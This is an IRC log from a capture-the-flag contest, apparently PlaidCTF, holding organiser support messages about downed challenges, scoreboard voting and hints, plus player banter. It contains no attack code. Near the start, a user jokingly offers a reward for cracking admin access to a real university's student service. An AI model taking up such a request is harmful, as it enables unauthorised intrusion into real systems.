  1987. (03:45:20) ••• jOin: (Luxerails) ([email protected])
  1988. (03:45:25) ••• jOin: (badeec) (~badeec@2a02:810d:640:7bc:6a5d:43ff:fe80:ce1a)
  1989. (03:45:31) (inter) [CISSP]ibit if you can crack admin for UBC's student service
  1990. (03:45:35) (inter) i will give you a cookie
  1991. (03:45:37) (+clockish) inter: there are a lot of crypto challenges
  1992. (03:45:44) (+clockish) like RSA!
  1993. (03:45:49) ([CISSP]ibit) lol
  1994. (03:45:49) (tokki) RSA!
  1995. (03:45:53) (+clockish) but, they are yet to be open
  1996. (03:46:02) (inter) pshhh RSA? thats not crypto
  1997. (03:46:04) ••• jOin: (ShortKidd) (60279873@gateway/web/freenode/ip.96.39.152.115)
  1998. (03:46:17) (+clockish) it's RSA, how can it not be crypto
  1999. (03:46:30) (tokki) " He's called The Plague, not The Nice Guy."
  2000. (03:46:30) (inter) thats crip-to
  2001. (03:46:39) (x7r0n) its forensics :-p
  2002. (03:46:39) (tokki) this reminds me of Bill nye the science guy
  2003. (03:46:45) (x7r0n) forensics-450
  2004. (03:46:55) (inter) crips and bloods and stuff
  2005. (03:46:58) (inter) killin people
  2006. (03:47:02) (inter) all dey errr dey
  2007. (03:48:17) (hellman) tylerni7: Last submission XX ago doesnt work
  2008. (03:48:25) (inter) hellman: tylerni7 afk
  2009. (03:48:37) (+frozencemetery) the elfs might let all the magic smoke out D:
  2010. (03:48:39) (arthurdent) clockish: is heartbleed still down?
  2011. (03:48:42) (+cai_) hellman: where?
  2012. (03:48:49) (+cai_) at the index page?
  2013. (03:48:49) (x7r0n) hey y cant u make the chronosphere recharge fastly
  2014. (03:48:50) (+clockish) arthurdent: yeah, working on it
  2015. (03:49:03) (+clockish) x7r0n: it takes lots of power
  2016. (03:49:09) (+clockish) too hard
  2017. (03:49:10) (inter) chronosphere is up when a team breakthroughs a new problem for first
  2018. (03:49:17) (x7r0n) get them some then :-p
  2019. (03:49:19) (hellman) cai_: yes. it shows we submitted a task 12 hours ago though we submitted two in the last hour
  2020. (03:49:32) (inter) clockish but what happens if you guys reach the end of the board?
  2021. (03:49:34) (+frozencemetery) we need to put more hearts back in heartbleed because they all bled out
  2022. (03:49:36) (inter) do you guys open up the rest?
  2023. (03:49:39) (+cai_) hellman: weird.. hmm
  2024. (03:49:43) (+clockish) inter: you'll have to get there and find out!
  2025. (03:49:46) ••• qUit: (factoreal) ([email protected]) Quit: Leaving.
  2026. (03:49:52) (inter) lets vote 6 bois
  2027. (03:49:55) (inter) end the ctf quick
  2028. (03:50:21) (+cai_) inter: it loops :p
  2029. (03:50:27) (hellman) cai_: team mate who submitted says he sees 8 minutes ago
  2030. (03:50:30) (+cai_) hellman: do other teammates also see the same thing?
  2031. (03:50:34) (hellman) :)
  2032. (03:50:35) (+cai_) ah ok
  2033. (03:50:41) ••• qUit: (zoff_ita) ([email protected]) Quit: Leaving.
  2034. (03:50:44) (+cai_) so it may just be caching, try refreshing
  2035. (03:50:52) ••• jOin: (nvs) (6adc6d77@gateway/web/cgi-irc/kiwiirc.com/ip.106.220.109.119)
  2036. (03:51:05) (+cai_) (or rather, that part isn't real time)
  2037. (03:51:25) (tokki) *gasp*
  2038. (03:51:58) (+cai_) actually nvm, it should be realtime, but i guess it was just out of sync
  2039. (03:52:04) (inter) im
  2040. (03:52:05) (inter) trying to
  2041. (03:52:10) (inter) apply accountings logics
  2042. (03:52:15) (inter) to macroeconomics
  2043. (03:52:19) (tokki) :O
  2044. (03:52:26) (ShortKidd) play terran
  2045. (03:52:30) (inter) and i think i shoudlnt do it
  2046. (03:52:34) (namrog84) i hate mtpox
  2047. (03:52:51) (+frozencemetery) hmm, you should vote big so that we can find out what happens at the end of the scoreboard because I'm too lazy too look at the source and figure it out
  2048. (03:53:01) (tokki) lol
  2049. (03:53:03) (inter) #lifeofafinancemajor
  2050. (03:53:14) (tokki) moniez
  2051. (03:53:35) (namrog84) anyone whos solved mtpox, can i ask you a simple question?
  2052. (03:53:48) (+cai_) frozencemetery: if you are talking about that empty boxes, the game pretends it's not there
  2053. (03:53:52) (+cai_) and it loops to the past
  2054. (03:54:03) (+frozencemetery) aww you killed the suspense :P
  2055. (03:54:13) (+cai_) but once we loop, the 'already opened' tiles are excluded for the roll :p
  2056. (03:54:18) (+cai_) hehe
  2057. (03:54:23) (ShortKidd) You should include them
  2058. (03:54:33) (+cai_) then it'd take forever to unlock problems
  2059. (03:54:38) (ShortKidd) exactly
  2060. (03:54:55) (ShortKidd) we'd actually have to work together to unlock more problems
  2061. (03:55:00) (+cai_) heh
  2062. (03:55:01) ••• qUit: (poppopret) ([email protected])
  2063. (03:55:02) ••• qUit: (stk|) ([email protected]) Ping timeout: 276 seconds
  2064. (03:55:09) ([CISSP]ibit) so far the hardest part of this challenge is finding a download for seccomp lib
  2065. (03:55:16) (+cai_) the voting has been working pretty well this year, actually
  2066. (03:55:19) (+cai_) i'm surprised
  2067. (03:55:37) (+cai_) every year, we have some sort of voting for opening up the next problem, but it usually just becomes pretty random
  2068. (03:55:41) (tokki) but how do you know what vote is for what prob?
  2069. (03:55:50) (ShortKidd) count forward that many spaces
  2070. (03:55:53) (+cai_) ^
  2071. (03:55:53) (tokki) oh
  2072. (03:56:11) (+cai_) the vote is for how many tiles you will go forward
  2073. (03:56:41) (tokki) damn now I get it
  2074. (03:56:42) (+cai_) now, i think people will get confused as we loop the board since the opened problem tiles are not being counted
  2075. (03:56:59) (ShortKidd) I should probably look at the problems a bit more than 5 minutes...
  2076. (03:57:01) (asmoday) heartbleed is still up?
  2077. (03:57:01) (+cai_) so you'll have to skip them when you calculate it (chance cards still count)
  2078. (03:57:07) (tokki) *nods*
  2079. (03:57:11) (ShortKidd) All chance, cai?
  2080. (03:57:18) (asmoday) not seeing any traffic
  2081. (03:57:25) (+clockish) asmoday: it is not still up
  2082. (03:57:26) (+cai_) asmoday: it's still being fixed
  2083. (03:57:28) (+clockish) I am working on it
  2084. (03:57:35) ••• qUit: (bobsteam) (1817f0b6@gateway/web/freenode/ip.24.23.240.182) Ping timeout: 240 seconds
  2085. (03:57:48) (+cai_) ShortKidd: once you land on a chance card, you can't land on another chance card on the next roll
  2086. (03:57:53) (+cai_) to prevent chance chain
  2087. (03:58:04) (ShortKidd) alright
  2088. (03:58:05) (tokki) chance chaining!
  2089. (03:58:17) • supersat stabs mtpox
  2090. (03:58:30) ••• jOin: (nectoo) ([email protected])
  2091. (03:58:38) • ShortKidd cries cause of mtpox's heartbleed from the stabbing
  2092. (03:58:50) (supersat) if only
  2093. (03:58:52) (tokki) lol
  2094. (03:59:02) (+cai_) i mean, the fact that you'll always have 3 unsolved problems wouldn't change. whole voting/boardgame is there for fun factor
  2095. (03:59:29) (+cai_) and give some capabilities to the players to choose which problem to be opened
  2096. (03:59:34) (ShortKidd) you should make them worth a negative amount of points, but put the negative sign in really small font
  2097. (03:59:44) (+cai_) lol
  2098. (04:00:36) (tokki) lol
  2099. (04:00:47) (+cai_) alright, i'm going to sleep now. cya all later
  2100. (04:00:51) (tokki) bbye
  2101. (04:00:55) (chuckleberry) <o
  2102. (04:01:07) (ShortKidd) bye
  2103. (04:01:11) ••• jOin: (jarCrack) ([email protected])
  2104. (04:01:26) ••• jOin: (fritz[]) ([email protected])
  2105. (04:01:52) (tomcr00se) omg rsa was solved!
  2106. (04:02:45) (warrick) clockish: could you nudge whatscats
  2107. (04:03:03) (+clockish) warrick yeah, sure
  2108. (04:03:09) ••• jOin: (nullProtectorate) ([email protected])
  2109. (04:03:14) (warrick) thanks
  2110. (04:03:27) (fritz[]) heartbleed seems down
  2111. (04:03:46) (Yen1) also could you nudge whatcats
  2112. (04:04:47) (+clockish) whatscats nudged with a large hammer
  2113. (04:04:48) (WhizzMan) fritz[]: clockish already said he's working on it
  2114. (04:04:58) (+clockish) fritz[]: yeah, real soon
  2115. (04:05:20) (hellman) cai_: i've logged in again in another browser and still 12 hours ago.
  2116. (04:05:34) (tokki) he's sleepin'
  2117. (04:05:34) (hellman) well that's not important at all
  2118. (04:05:38) ••• jOin: (f___) (5f1dfc82@gateway/web/freenode/ip.95.29.252.130)
  2119. (04:05:47) (hellman) that stuff i mean :D
  2120. (04:05:51) (mttpgrm) is the hidden service up?
  2121. (04:05:59) ••• jOin: (poppopret) ([email protected])
  2122. (04:06:01) (Yen1) clockish: thanks
  2123. (04:06:07) (mttpgrm) can't get to it through my own tor connection or on tor2web
  2124. (04:06:09) (warrick) clockish: thank you!
  2125. (04:06:23) (fritz[]) thx
  2126. (04:06:34) (reanimus) beautiful how much faster whatscat runs after emptying the db lol
  2127. (04:06:45) ••• jOin: (stk|) ([email protected])
  2128. (04:06:49) ••• nIck: ([CISSP]ibit) is now known as (insanitybit)
  2129. (04:06:54) ••• qUit: (nvs) (6adc6d77@gateway/web/cgi-irc/kiwiirc.com/ip.106.220.109.119) Quit: http://www.kiwiirc.com/ - A hand crafted IRC client
  2130. (04:06:57) (reanimus) pretty sure the reason the exploit wasn’t working was cause the query was timing out lol
  2131. (04:07:33) (insanitybit) k how do i change my name back
  2132. (04:07:50) ••• qUit: (nullProtectorate) ([email protected]) Ping timeout: 258 seconds
  2133. (04:08:04) ••• jOin: (chunderstruck1) ([email protected])
  2134. (04:08:16) (insanitybit) o
  2135. (04:08:17) (insanitybit) i did it
  2136. (04:08:24) ••• nIck: (tokki) is now known as (evertokki)
  2137. (04:08:30) ••• pArt: (insanitybit) (969cdb9b@gateway/web/freenode/ip.150.156.219.155)
  2138. (04:08:58) ••• jOin: (insanitybit) (969cdb9b@gateway/web/freenode/ip.150.156.219.155)
  2139. (04:09:13) ••• qUit: (patcdr) ([email protected]) Quit: lol wut
  2140. (04:10:13) (evertokki) lol that exit message
  2141. (04:10:20) ••• jOin: (HeadHunter) ([email protected])
  2142. (04:10:29) (ryan-c) any plaid people awake?
  2143. (04:10:34) (ryan-c) I have a question about rsa
  2144. (04:10:39) (insanitybit) barely
  2145. (04:10:44) (insanitybit) rsa nsa backdooors
  2146. (04:10:48) (evertokki) I think clockish is awake
  2147. (04:10:53) (+clockish) I am
  2148. (04:10:55) (insanitybit) he is
  2149. (04:11:01) (+clockish) and trying to fix heartbleed
  2150. (04:11:06) (+frozencemetery) I am also awake
  2151. (04:11:07) (evertokki) kudos, man
  2152. (04:11:10) (ryan-c) it's a quick question
  2153. (04:11:15) (mrsmith67) heartbleed down?
  2154. (04:11:25) (+frozencemetery) ryan-c: I can't guarantee that I can help, but pm?
  2155. (04:11:28) (insanitybit) so like i literally cant get the pwnable to execute
  2156. (04:11:31) (+frozencemetery) mrsmith67: coming back soonish
  2157. (04:11:32) (insanitybit) and im too drunk
  2158. (04:11:34) (insanitybit) for gdb
  2159. (04:11:36) (insanitybit) and hopper
  2160. (04:11:45) (+frozencemetery) mrsmith67: we bled too many hearts and have to put more in it
  2161. (04:11:48) (synthverity) Alcohol is funnnnnnnnnnnnnnnnn.
  2162. (04:11:49) (evertokki) :O
  2163. (04:11:58) (+clockish) mrsmith67 yes it is, working on it
  2164. (04:11:58) (pipecork) alcohol is fun.
  2165. (04:12:00) (synthverity) I'm so drunk that it is fun
  2166. (04:12:09) (synthverity) I can't type
  2167. (04:12:12) (evertokki) lol
  2168. (04:12:18) (insanitybit) ^uses 's
  2169. (04:12:26) (synthverity) Grammer matters
  2170. (04:12:28) (insanitybit) apostraphes
  2171. (04:12:38) (synthverity) Fucking newbies
  2172. (04:12:45) (synthverity) Grammar
  2173. (04:12:46) (synthverity) Fuck
  2174. (04:13:15) (evertokki) grammar loves you
  2175. (04:13:21) (synthverity) Even with alcohol, grammar is still important
  2176. (04:13:22) ••• qUit: (trelgak) ([email protected]) Ping timeout: 250 seconds
  2177. (04:13:36) (synthverity) Why can't the room stop spinning?
  2178. (04:13:46) (evertokki) lol
  2179. (04:13:51) (X-N2O_) who wrote hudak (reversing 250)?
  2180. (04:13:59) (namrog84) salt n pepper
  2181. (04:14:01) (synthverity) A person
  2182. (04:14:04) ••• jOin: (Sin__) ([email protected])
  2183. (04:14:07) ••• jOin: (tigerwash) ([email protected])
  2184. (04:14:10) (evertokki) hints? hints? hints??
  2185. (04:14:14) (+frozencemetery) X-N2O_: that's mserrano's problem; he's asleep
  2186. (04:14:16) ••• jOin: (stypr) ([email protected])
  2187. (04:14:16) ••• jOin: (Otacon22) ([email protected])
  2188. (04:14:20) (+frozencemetery) evertokki: hints come through Chance :)
  2189. (04:14:23) • evertokki is thirsty for hints
  2190. (04:14:27) (evertokki) :O
  2191. (04:14:31) (stypr) hi
  2192. (04:14:32) (X-N2O_) ah i see thanks
  2193. (04:14:35) (tigerwash) hi guys, the heartbleed challange seems down, is that right?
  2194. (04:14:36) (evertokki) EVERYONE VOTE 1 AFTER THIS
  2195. (04:14:36) (Otacon22) is rendezvous working?
  2196. (04:14:38) (stypr) so difficult.
  2197. (04:14:49) (plo) is heartbleed still down?
  2198. (04:14:55) (evertokki) you guys should put 'heartbleed down' for notice or smthing.
  2199. (04:14:55) (+frozencemetery) tigerwash: yes, it bled all the hearts out so it's down while we refill the hearts
  2200. (04:14:57) (+frozencemetery) plo: ^
  2201. (04:14:59) ••• qUit: (HeadHunter) ([email protected]) Ping timeout: 252 seconds
  2202. (04:15:02) ••• jOin: (Kyrah) ([email protected])
  2203. (04:15:20) (stypr) is heartbleed dead?
  2204. (04:15:22) (plo) :) thx
  2205. (04:15:22) (arthurdent) :(
  2206. (04:15:25) (evertokki) lol
  2207. (04:15:55) ••• jOin: (HeadHunter) ([email protected])
  2208. (04:16:13) ••• jOin: (trelgak) ([email protected])
  2209. (04:16:17) ••• jOin: (qwasdf) (afc14aa8@gateway/web/freenode/ip.175.193.74.168)
  2210. (04:16:19) (+frozencemetery) evertokki: there already is one
  2211. (04:16:39) (ShortKidd) meh imma sleep
  2212. (04:16:54) ••• jOin: (OS-11532) ([email protected])
  2213. (04:17:01) (ShortKidd) beback in like 4 ish hours
  2214. (04:17:05) (synthverity) Sleep? Fucking pointless
  2215. (04:17:19) ••• nIck: (OS-11532) is now known as (raudi)
  2216. (04:17:25) (synthverity) I'm drunk and I don't need sleep
  2217. (04:18:02) ••• qUit: (Sliden) ([email protected]) Ping timeout: 252 seconds
  2218. (04:18:23) (synthverity) I can sleep when the devil calls my name
  2219. (04:18:35) ••• qUit: (Guest77623) (4ba3c7ba@gateway/web/freenode/ip.75.163.199.186) Ping timeout: 240 seconds
  2220. (04:19:03) (pipecork) shit
  2221. (04:19:08) (pipecork) that's hxc
  2222. (04:21:47) (WhizzMan) toor
  2223. (04:21:55) ••• jOin: (approximatehack) (7ab36aae@gateway/web/freenode/ip.122.179.106.174)
  2224. (04:22:20) ••• qUit: (tigerwash) ([email protected]) Quit: leaving
  2225. (04:22:33) (+frozencemetery) garlic: The Other Onion Router
  2226. (04:23:42) ••• jOin: (dunamis) (~dunamis@unaffiliated/dunamis)
  2227. (04:23:45) (dunamis) moin
  2228. (04:25:24) ••• qUit: (reanimus) ([email protected]) Quit: reanimus
  2229. (04:26:59) ••• jOin: (bobsteam) (1817f0b6@gateway/web/freenode/ip.24.23.240.182)
  2230. (04:27:05) (approximatehack) heartbeat server down?
  2231. (04:27:47) (mttpgrm) ye
  2232. (04:28:05) (+clockish) approximatehack yes
  2233. (04:28:06) (HeadHunter) web300 problem? I mean "ssss" ;)
  2234. (04:28:11) ••• qUit: (_bcc) ([email protected]) Ping timeout: 240 seconds
  2235. (04:28:30) (bobsteam) yeah, hitting probs with web300 as well
  2236. (04:28:42) (+clockish) is web300 whatscat?
  2237. (04:28:46) (bobsteam) yup
  2238. (04:28:54) (+clockish) I'll kick it, hang on
  2239. (04:29:12) ••• jOin: (makler2004) ([email protected])
  2240. (04:30:23) ••• qUit: (trelgak) ([email protected]) Ping timeout: 240 seconds
  2241. (04:30:26) (+clockish) bobsteam: HeadHunter: what'scat should be back
  2242. (04:30:46) (bobsteam) tyty
  2243. (04:32:13) ••• jOin: (B1N4RY) (0e23effa@gateway/web/freenode/ip.14.35.239.250)
  2244. (04:32:18) (B1N4RY) Hello guys
  2245. (04:32:20) ••• qUit: (braoru) ([email protected]) Quit: braoru
  2246. (04:34:05) ••• qUit: (insanitybit) (969cdb9b@gateway/web/freenode/ip.150.156.219.155) Ping timeout: 240 seconds
  2247. (04:34:16) (+clockish) B1N4RY hi!
  2248. (04:35:37) (B1N4RY) pCTF this year isn't too difficult, but still not an easy CTF :(
  2249. (04:35:56) (+clockish) :) we try
  2250. (04:36:07) ••• jOin: (plaintext) ([email protected])
  2251. (04:36:27) (+clockish) congratz to 0xffa for ZFS solve!
  2252. (04:37:04) (+frozencemetery) someone who solved ZFS from 0xffa, can you pm me? Nothing bad, I just have a question
  2253. (04:37:29) (auscompgeek) lel zfs
  2254. (04:37:42) (B1N4RY) Wow frozencemetery scared me even though I am not one of 0xffas
  2255. (04:38:00) ••• jOin: (braoru) ([email protected])
  2256. (04:38:02) (sven) :D
  2257. (04:38:08) ••• jOin: (insanitybit) (969cdb9b@gateway/web/freenode/ip.150.156.219.155)
  2258. (04:38:22) (+frozencemetery) B1N4RY: heh, sorry :)
  2259. (04:38:24) (+clockish) 0xffa: The creator advertised ZFS as being really hard, so we would like to discuss how awesome you are ^_^
  2260. (04:38:26) (stypr) dat mtpox..
  2261. (04:39:19) ••• jOin: (krycek) ([email protected])
  2262. (04:39:33) (B1N4RY) mtpox..lol..
  2263. (04:39:47) ••• qUit: (Salutken) ([email protected]) Ping timeout: 240 seconds
  2264. (04:39:56) ••• jOin: (zoff_ita) ([email protected])
  2265. (04:39:57) (namrog84) hate it
  2266. (04:40:03) (namrog84) it must die
  2267. (04:40:14) (B1N4RY) clockish: Do you really have to 'discuss' how awesome he is lololol
  2268. (04:40:35) (zoff_ita) hi!
  2269. (04:40:53) (+frozencemetery) B1N4RY: if you want the truth, we're looking to make fun of the person who made zfs :)
  2270. (04:40:54) (+clockish) B1N4RY: yes. awesome is srs bzns.
  2271. (04:41:01) (zoff_ita) any admin up for a question about web150?
  2272. (04:41:34) (krycek) heartbleed still downb?
  2273. (04:41:36) (+clockish) zoff_ita: is that mt pox?
  2274. (04:41:44) (+clockish) krycek: yes it is still down, sorry
  2275. (04:41:46) (+clockish) working on it
  2276. (04:41:53) (krycek) np, just checking
  2277. (04:42:06) (zoff_ita) clockish: yep
  2278. (04:42:30) (supersat) heh... I was wondering if the challenge was to guess the port :P
  2279. (04:42:34) (+clockish) zoff_ita: pm me in like 5 min, I almost have heartbleed back online
  2280. (04:42:38) (supersat) sorry about hitting them all at once :x
  2281. (04:42:57) (zoff_ita) clockish: ok, tnx
  2282. (04:44:46) ••• jOin: (Noxr) ([email protected])
  2283. (04:44:58) ••• qUit: (dhanvi) (uid26809@gateway/web/irccloud.com/x-kianptpjxdbfaxdb) Quit: Connection closed for inactivity
  2284. (04:46:45) ••• jOin: (trelgak) ([email protected])
  2285. (04:48:26) ••• jOin: (mouth`) ([email protected])
  2286. (04:48:32) ••• jOin: (CW) (c50626a8@gateway/web/freenode/ip.197.6.38.168)
  2287. (04:48:35) ••• qUit: (approximatehack) (7ab36aae@gateway/web/freenode/ip.122.179.106.174) Ping timeout: 240 seconds
  2288. (04:48:52) ••• jOin: (_bcc) ([email protected])
  2289. (04:49:07) ••• jOin: (approximatehack) (7ab326bb@gateway/web/freenode/ip.122.179.38.187)
  2290. (04:50:04) ••• qUit: (jarCrack) ([email protected]) Quit: Verlassend
  2291. (04:50:28) (B1N4RY) Hmm
  2292. (04:50:42) (B1N4RY) when is Heartbleed going to be available?
  2293. (04:51:06) (+frozencemetery) B1N4RY: unsure. Probably best to work on something else for a while, sorry
  2294. (04:51:12) (+clockish) "soon"
  2295. (04:51:15) (+frozencemetery) it takes a while to find people to harvest hearts from at this hour
  2296. (04:51:17) (B1N4RY) :D
  2297. (04:51:26) (asmoday) yeah did not think zfs would be just a scalpel away
  2298. (04:51:30) ••• qUit: (trelgak) ([email protected]) Ping timeout: 250 seconds
  2299. (04:52:52) ••• qUit: (asmoday) ([email protected]) Quit: Rage Quit
  2300. (04:54:33) (B1N4RY) RAAAGGEEEE QUUIIIITTT
  2301. (04:54:58) (synthverity) Fuck yea Alcohol
  2302. (04:55:07) (WhizzMan) frozencemetery: I would suggest putting up your resume and use the recruiters that would flock to that, but they don't have a heart :s
  2303. (04:55:22) (+frozencemetery) haha zing!
  2304. (04:55:38) (+frozencemetery) sooo glad I don't have to worry about resumes for a while
  2305. (04:56:16) (stypr) how come I am the only one who didn't solve mtpox yet
  2306. (04:56:28) ••• jOin: (synick) ([email protected])
  2307. (04:56:39) (stypr) btw mtpox was actually a phishing site for mtgox
  2308. (04:57:31) (insanitybit) what happened with cahnce
  2309. (04:57:47) (slinkyman) got nothing
  2310. (04:58:11) ••• qUit: (wahwah) ([email protected]) Ping timeout: 240 seconds
  2311. (04:58:41) (insanitybit) i dotn know json xmgfd
  2312. (04:58:55) ••• qUit: (f00b4r_) ([email protected]) Read error: Connection reset by peer
  2313. (04:59:36) ••• jOin: (Onemore) ([email protected])
  2314. (04:59:49) ••• qUit: (gut) ([email protected]) Quit: My MacBook Pro has gone to sleep. ZZZzzz…
  2315. (04:59:51) ••• jOin: (f00b4r_) ([email protected])
  2316. (05:00:55) ••• jOin: (glzo) (76468068@gateway/web/freenode/ip.118.70.128.104)
  2317. (05:01:42) ••• qUit: (f00b4r_) ([email protected]) Read error: Connection reset by peer
  2318. (05:02:14) ••• jOin: (gut) ([email protected])
  2319. (05:02:23) ••• jOin: (f00b4r_) ([email protected])
  2320. (05:02:23) ••• qUit: (hkr`) (~hkr@unaffiliated/hkr/x-6459160) Ping timeout: 240 seconds
  2321. (05:04:26) (+clockish) congratz samuri, first blood!
  2322. (05:04:30) (supersat) stypr: I haven't solved it either :( it seemed like it'd be so easy too
  2323. (05:05:21) (ius) paris is 404?
  2324. (05:05:49) (ius) http://play.plaidctf.com/files/paris-accb1b840fcb5aa98561827e2bb8950b.tar.bz2
  2325. (05:05:55) (+frozencemetery) yes, working on it
  2326. (05:06:06) (stypr) (sigh)
  2327. (05:06:23) (synthverity) Vote 1 guys. Get each piece one by one
  2328. (05:06:31) (synthverity) Like Noah, except minus one
  2329. (05:06:41) (synthverity) Because fuck two by two
  2330. (05:06:55) ••• nIck: (vladum_) is now known as (vladum|away)
  2331. (05:07:13) (+frozencemetery) fixed
  2332. (05:07:14) (+clockish) THE ANTS GO MARCHING TWO BY TWO, HURRAH, HURRAH
  2333. (05:07:17) (+frozencemetery) apologies for the mixup
  2334. (05:07:21) (+frozencemetery) you may need to reload the page
  2335. (05:07:47) ••• qUit: (p4574) ([email protected]) Ping timeout: 252 seconds
  2336. (05:09:01) ••• jOin: (halfvollemelk) (589f763c@gateway/web/freenode/ip.88.159.118.60)
  2337. (05:09:25) (insanitybit) clockish
  2338. (05:09:29) (insanitybit) if i say clockish does it pping you
  2339. (05:09:38) ••• jOin: (rvpersie_) ([email protected])
  2340. (05:09:55) (foundation) hmm, guys, is there a reason i don't see now challenges as open?
  2341. (05:10:03) ••• jOin: (p4574) ([email protected])
  2342. (05:10:29) (+frozencemetery) foundation: are you looking at the correct side of the board?
  2343. (05:10:33) (halfvollemelk) Is it true the TOR page for Rendesvous (MISC 250) is down?
  2344. (05:10:34) (+clockish) insanitybit: yes
  2345. (05:10:44) (insanitybit) clockish woah woah
  2346. (05:11:04) (+clockish) halfvollemelk: that problem is currently working as intended
  2347. (05:11:35) ••• qUit: (sakana) (3b9ffaf2@gateway/web/freenode/ip.59.159.250.242) Ping timeout: 240 seconds
  2348. (05:11:46) (foundation) frozencemetery: there is another side of the board? hhow do i get there?
  2349. (05:12:04) (+frozencemetery) foundation: as stated in the rules, click on the glowing ball in the middle of the spinner
  2350. (05:12:04) (insanitybit) ^
  2351. (05:12:06) (inter) clockish: fuck it im done studying
  2352. (05:12:12) (inter) im going to yolo my finals
  2353. (05:12:23) (+frozencemetery) fuck school ctf all day
  2354. (05:12:26) (inter) or a final since its only one tmr
  2355. (05:12:26) (+frozencemetery) (don't take that advice)
  2356. (05:12:26) (insanitybit) who cares about finals
  2357. (05:12:32) (insanitybit) or school
  2358. (05:12:35) (insanitybit) or anything even
  2359. (05:12:48) (+clockish) insanitybit: I care about CTF!
  2360. (05:12:48) (inter) frozencemetery: exam in 8 hours, i need to sleep too and i commute
  2361. (05:12:56) (foundation) *facepalm* thanks frozencemetery
  2362. (05:13:06) (insanitybit) ctf is the opiate of the masses
  2363. (05:13:24) (inter) clockish: you'd better release the hint for pwn375 or rsa :S
  2364. (05:13:30) (insanitybit) there are hints?
  2365. (05:13:40) (inter) i risked 6 hours of my life to do your problem
  2366. (05:13:40) (sven) hints are boring
  2367. (05:13:44) (+clockish) Hints will go on the page
  2368. (05:13:45) (inter) instead of studying for final
  2369. (05:13:50) (insanitybit) what page
  2370. (05:13:53) (inter) after i come back from 3 hour exam
  2371. (05:14:11) (inter) or ill probably die in a heartattack
  2372. (05:14:19) (insanitybit) rip
  2373. (05:15:22) (insanitybit) im tiered
  2374. (05:15:59) ••• qUit: (whois) ([email protected]) Ping timeout: 240 seconds
  2375. (05:16:01) ••• qUit: (you0708) ([email protected]) Remote host closed the connection
  2376. (05:16:09) ••• qUit: (siginttv) ([email protected]) Read error: Connection reset by peer
  2377. (05:16:14) ••• jOin: (shabgard) (~mostafa@unaffiliated/shabgard)
  2378. (05:16:16) (insanitybit) can you just put a pwnable up where i send 100 A's and i get the key back
  2379. (05:16:22) (insanitybit) i think CSAW had something like that lmao
  2380. (05:16:32) (inter) 100 As?
  2381. (05:16:35) (inter) back in codegate
  2382. (05:16:41) (insanitybit) yeah like A but 100x
  2383. (05:16:42) (inter) a problem displayed the key for first 5 minutes
  2384. (05:16:44) (B1N4RY) Any hints for MtPOX?
  2385. (05:17:07) (+frozencemetery) mtgox:drugs::mtpox:rugs
  2386. (05:17:09) ••• qUit: (x7r0n) ([email protected]) Read error: Connection reset by peer
  2387. (05:17:15) (+frozencemetery) ^ not a hint
  2388. (05:17:20) (inter) mtpox: 420
  2389. (05:17:22) (inter) mtpox: 420
  2390. (05:17:22) (inter) mtpox: 420
  2391. (05:17:25) (namrog84) the drugs are hiding in the rugs?
  2392. (05:17:27) ••• jOin: (x7r0n) (x7r0n@2002:75fe:a990::75fe:a990)
  2393. (05:17:31) (s_kunk) there's a flag to find
  2394. (05:17:31) (inter) im telling you man
  2395. (05:17:33) (inter) its 420
  2396. (05:17:34) (B1N4RY) 420?
  2397. (05:17:35) (s_kunk) ^ that's a hint
  2398. (05:17:35) ••• qUit: (glzo) (76468068@gateway/web/freenode/ip.118.70.128.104) Ping timeout: 240 seconds
  2399. (05:17:38) (B1N4RY) 420????
  2400. (05:17:41) (inter) 420
  2401. (05:17:41) (B1N4RY) oh
  2402. (05:17:41) (inter) yep
  2403. (05:17:43) (insanitybit) lol
  2404. (05:17:45) (namrog84) thats not 8 characters
  2405. (05:17:46) (B1N4RY) got it '^'
  2406. (05:17:52) ••• qUit: (l0ve) (72560111@gateway/web/freenode/ip.114.86.1.17) Quit: Page closed
  2407. (05:17:59) (inter) 420blaze is 8 characters
  2408. (05:18:02) (inter) umadm8?
  2409. (05:18:07) ••• jOin: (ccmndhd) ([email protected])
  2410. (05:18:16) ••• jOin: (l0ve) (72560111@gateway/web/freenode/ip.114.86.1.17)
  2411. (05:18:23) (insanitybit) wrekcdd
  2412. (05:18:42) ••• qUit: (l0ve) (72560111@gateway/web/freenode/ip.114.86.1.17) Client Quit
  2413. (05:18:55) (namrog84) iubermadandepicsad
  2414. (05:19:03) (insanitybit) dam
  2415. (05:19:06) (insanitybit) is that the key
  2416. (05:19:06) ••• jOin: (pcc7) (72560111@gateway/web/freenode/ip.114.86.1.17)
  2417. (05:19:19) (pcc7) anyone working on pyjail?
  2418. (05:19:22) (insanitybit) yes
  2419. (05:19:33) (insanitybit) i feel like im mostly done w/ it but i stopped working hours ago to drink
  2420. (05:19:38) (B1N4RY) Is ^ in mtpox something to do with bitwise
  2421. (05:19:59) ••• qUit: (rvpersie_) ([email protected]) Remote host closed the connection
  2422. (05:20:36) (insanitybit) more like a bitdumb
  2423. (05:20:36) (insanitybit) heh
  2424. (05:20:36) (s_kunk) ^ was not a hint, scrollback ;)
  2425. (05:20:43) (inter) one
  2426. (05:20:46) (inter) hell of a pwnable
  2427. (05:20:50) (inter) we're getting
  2428. (05:21:12) (insanitybit) kappa
  2429. (05:21:57) (insanitybit) start spam
  2430. (05:21:58) (insanitybit) isi the key
  2431. (05:23:08) (B1N4RY) Oh
  2432. (05:23:10) (B1N4RY) ...
  2433. (05:23:21) (B1N4RY) 420? 420?
  2434. (05:23:25) (B1N4RY) What is 420!!!!
  2435. (05:23:45) (+frozencemetery) 410 is a drug reference
  2436. (05:23:50) (+frozencemetery) *420 wow
  2437. (05:23:59) (+frozencemetery) ^ my mind has been P3 and I apologize
  2438. (05:24:20) (bobsteam) holy shit, I think I just got the hint ... lol ~_~
  2439. (05:25:35) ••• qUit: (inter) ([email protected]) Read error: No route to host
  2440. (05:25:56) ••• jOin: (hu) ([email protected])
  2441. (05:26:05) (Nanomebia) shouldn't there be another challenge open?
  2442. (05:27:01) ••• pArt: (vesh) ([email protected])
  2443. (05:27:04) (insanitybit) oh god
  2444. (05:27:05) (insanitybit) oh god
  2445. (05:27:16) ••• jOin: (rvpersie) ([email protected])
  2446. (05:27:21) (WhizzMan) thats what she said
  2447. (05:27:35) ••• qUit: (CW) (c50626a8@gateway/web/freenode/ip.197.6.38.168) Ping timeout: 240 seconds
  2448. (05:28:20) ••• qUit: (p4574) ([email protected]) Quit: Leaving.
  2449. (05:29:01) (insanitybit) 3 pokemon
  2450. (05:29:02) (insanitybit) gotta catchem all
